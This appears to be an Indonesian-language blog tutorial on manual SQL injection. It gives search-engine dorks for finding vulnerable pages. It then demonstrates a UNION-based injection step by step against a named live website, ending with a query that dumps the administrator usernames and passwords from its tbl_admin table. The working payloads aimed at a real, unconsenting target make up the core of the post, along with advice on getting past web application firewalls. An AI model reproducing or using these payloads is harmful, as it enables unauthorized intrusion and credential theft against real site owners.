[+] dork google = projects.php?cat_id=
index.php?id=
Sisanya Cari di mbah gugel , bejibun , atau kembangin sendiri
[+] hackbar = untuk permudah exploitasi
Download HACKBAR
[+] susu perawan dan kopi hangat
oke live target nya ini aja
http://www.rubin-arch.co.il/projects.php?cat_id=5
1. check vulnnya pakai kutip atas ( ' )
![[Image: RMRMp7h.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkxpi_B9dlMSH3I02Gc0ZoQNt14-fRwwRsWstnqXi7sAW5kDHjDxX2WR6431s-_KMjnhVt9-BVMRAprt91D0JafHWglXdAAHkxw9GIQETvwuyPO7iPeTzQicnjk3tar1ZR2H7n1JxxAo/h120/lazy+image.gif)
2. find ada berapa table menggunakan
5 order by --
-5 order by 1--
5' order by 1--+
![[Image: G1rc1d0.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkxpi_B9dlMSH3I02Gc0ZoQNt14-fRwwRsWstnqXi7sAW5kDHjDxX2WR6431s-_KMjnhVt9-BVMRAprt91D0JafHWglXdAAHkxw9GIQETvwuyPO7iPeTzQicnjk3tar1ZR2H7n1JxxAo/h120/lazy+image.gif)
![[Image: IeS3haw.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkxpi_B9dlMSH3I02Gc0ZoQNt14-fRwwRsWstnqXi7sAW5kDHjDxX2WR6431s-_KMjnhVt9-BVMRAprt91D0JafHWglXdAAHkxw9GIQETvwuyPO7iPeTzQicnjk3tar1ZR2H7n1JxxAo/h120/lazy+image.gif)
http://www.rubin-arch.co.il/projects.php?cat_id=5 order by 6-- < Error
berarti ada 5 table di web itu

3.cari letak table yang di gunakan untuk eksekusi/mencari db nya
http://www.rubin-arch.co.il/projects.php?cat_id=5 union select 1,2,3,4,5-- <<< whats ? kagak muncul letaknya ? itu kurang di kasih susu perawan
tambahin ( - ) strip di depan angka
![[Image: pxJjCvC.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkxpi_B9dlMSH3I02Gc0ZoQNt14-fRwwRsWstnqXi7sAW5kDHjDxX2WR6431s-_KMjnhVt9-BVMRAprt91D0JafHWglXdAAHkxw9GIQETvwuyPO7iPeTzQicnjk3tar1ZR2H7n1JxxAo/h120/lazy+image.gif)
4. langsung aja di dios

apa itu dios ? dump in one shop

![[Image: bPEOCOD.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkxpi_B9dlMSH3I02Gc0ZoQNt14-fRwwRsWstnqXi7sAW5kDHjDxX2WR6431s-_KMjnhVt9-BVMRAprt91D0JafHWglXdAAHkxw9GIQETvwuyPO7iPeTzQicnjk3tar1ZR2H7n1JxxAo/h120/lazy+image.gif)
asal jangan WAF

macam forbidden , not acceptable , denied ahaha
5. itu sudah jelas letak user dan pass adminnya ada di tbl_admin
langsung inject bray
http://www.rubin-arch.co.il/projects.php?cat_id=-5 union select 1,2,group_concat(user_name,0x7c,user_pass),4,5 from tbl_admin--
terettereteret ketemukan
![[Image: IKtgssj.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkxpi_B9dlMSH3I02Gc0ZoQNt14-fRwwRsWstnqXi7sAW5kDHjDxX2WR6431s-_KMjnhVt9-BVMRAprt91D0JafHWglXdAAHkxw9GIQETvwuyPO7iPeTzQicnjk3tar1ZR2H7n1JxxAo/h120/lazy+image.gif)
so simple ?
Terima kasih kepada HumanEdoTensei atas tutorial nya ini :D
0 Response to "Sql Injection Manual [Basic]"
Posting Komentar